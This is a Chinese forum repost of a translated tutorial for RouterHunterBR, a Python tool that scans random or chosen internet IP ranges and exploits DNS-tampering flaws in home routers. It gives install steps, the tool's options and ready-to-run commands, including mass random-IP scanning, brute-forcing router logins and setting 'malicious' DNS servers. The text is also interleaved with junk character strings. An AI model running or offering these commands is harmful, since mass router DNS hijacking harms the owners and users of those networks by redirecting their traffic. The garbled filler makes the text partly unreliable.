转载的 j. v% }# C) h& N2 O" n5 P6 O( E
 0 j# n' G* a& G/ D
: D1 ]1 q* G' e+ h" n1 M: v0 O3 k9 n% `& O7 b
0×00 前言我们会介绍一款自动挖掘路由器漏洞的测试工具,它能够自动化在互联网大范围搜索包含漏洞的路由,进行测试、进一步确认这些漏洞问题,其中会涉及D-link 的多款路由器。该工具是采用python 2.X写的,因此我们最好使用python2.7 来运行它,所以希望提前安装好相关的环境。当然我是在kali-linux 下直接运行的,因为该款操作系统是预先安装好了测试环境的。 0×01 下载2 我们将该压缩包 下载到 根目录下, 即是/root/Routerhunter-2.0-master.zip, 然后我们解压在 同一个目录下,即是 /root/Routerhunter 3 我们进入该目录root@kali:~/Routerhunter# 4 运行该程序root@kali:~/Routerhunter# python routerhunter.py -h 5 我们可以看到相关的使用介绍
0×02 介绍 RouterhunterBR 是一个 自动化安全工具,它能够搜索并且自动化测试互联网上路由器的漏洞,Routerhunter 旨在通过互联网去探索自定义的IP地址或者任意的IP地址以便自动地攻击这些家庭路由器中的DNS篡改漏洞,这个脚本能够测试路由器上的四种漏洞
; D. m7 x/ Y; I4 `2 n. d0×03 安装要求
2 q3 `& g4 E+ G& P/ ^1 在我们python当中,能够导入如下库 sys, os, argparse, itertools, requests, random, time, threading, base64, socket,datetime 2 如果没有这些库,可以采用如下的任意方式安装 pip install datetimeapt-get install datetimeeasy_install datetime
2 ^2 w) R% k3 |( u% a0×04 使用1 使用说明 optional arguments: # 可选的参数
1 p' d4 }( l; n+ Y% Q8 _ -h, –help show this help message and exit # 显示这个帮助信息,然后退出程序: g! k1 U! d# d. m
-range 192.168.1.0-255, –range 192.168.1.0-255 Set range of IP #定义需要扫描的IP地址范围。例如 –range 192.168.1.0-255, 可以扫描这个IP段% p: [; F1 J1 M5 Q
-bruteforce, –bruteforce Brute force with users and passwords on routers that requires authentication, forcing alteration of dns. # 暴力破解需要认证的路由器,迫使这些路由器修改DNS
/ z! V1 k- n! P2 _7 C -startip 192.168.*.*, –startip 192.168.*.* Start – IP range customized with wildcard / 201.*.*.* # 使用掩码的来定义开始IP地址范围,例如 192.168.*.*
1 u3 t' C" T; ]$ s; X/ M -endip 192.168.*.*, –endip 192.168.*.* End – IP range customized with wildcard / 201.*.*.* # 使用掩码的来定义结束IP地址范围,例如 192.168.*.*
5 `6 e2 w4 p% a5 l -dns1 8.8.8.8, –dns1 8.8.8.8 Define malicious dns1 #定义第一个恶意的DNS,例如可以把这些路由器的DNS改成8.8.8.8
; C7 k/ t$ u3 a -dns2 8.8.4.4, –dns2 8.8.4.4 Define malicious dns2 #定义第二个恶意的DNS,例如可以把这些路由器的DNS改成8.8.8.8" C# A& N( s) J0 U5 H- S% n
–threads 10 Set threads numbers #设置请求线程数目
7 a5 r. k% l% k: [1 a* C" o -rip, –randomip Randomizing ips routers #随机定义网络上的路由器IP
8 D) l- q- n: |. ~# u0 [2 F, N -lmtip 10, –limitip 10 Define limite random ip # 定义一定数目的任意IP地址
) _( Y; z2 |1 o: p% \. |+ U 2 使用案例/ w. a1 r m! Z1 z
扫描任意IP: python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --randomip --limitip 10 --threads 10 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 -rip -lmtip 10 --threads 10$ j# ~& d* o5 o9 C+ F9 f( N
! \# N# {2 Y. i2 P7 H. M
扫描一段IP范围: python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --range 192.168.25.0-255 --threads 105 O9 T, i9 `! [ X
使用掩码的形式进行扫描: python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.8 --startip 192.168.*.* --endip 192.168.*.* --threads 10
# r/ M/ c1 j/ |+ m% t暴力破解需要认证的路由器 python routerhunter.py --dns1 8.8.8.8 --dns2 8.8.4.4 --range 177.106.19.65-70 --bruteforce --threads 10( a0 R2 a: j, k L
3 使用结果截图
& G2 f- J+ y0 W F4 r% U: r
0 {1 A4 i4 [8 [: y& u9 Q7 u
0×05 总结1 这个脚本可以用于路由器的渗透测试。 2 在进行路由器安全评估的时候,我们也可以使用这个脚本对其安全性进行检查 3 这是国外一款渗透测试工具的中文译文!请大家多多指教 ^^_^^ O3 R9 e/ k9 _6 K& e
原文链接:http://www.freebuf.com/sectool/101180.html
' j; V5 B0 A2 q: ^ | 
IP卡
狗仔卡
发表于 2016-4-15 09:48
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
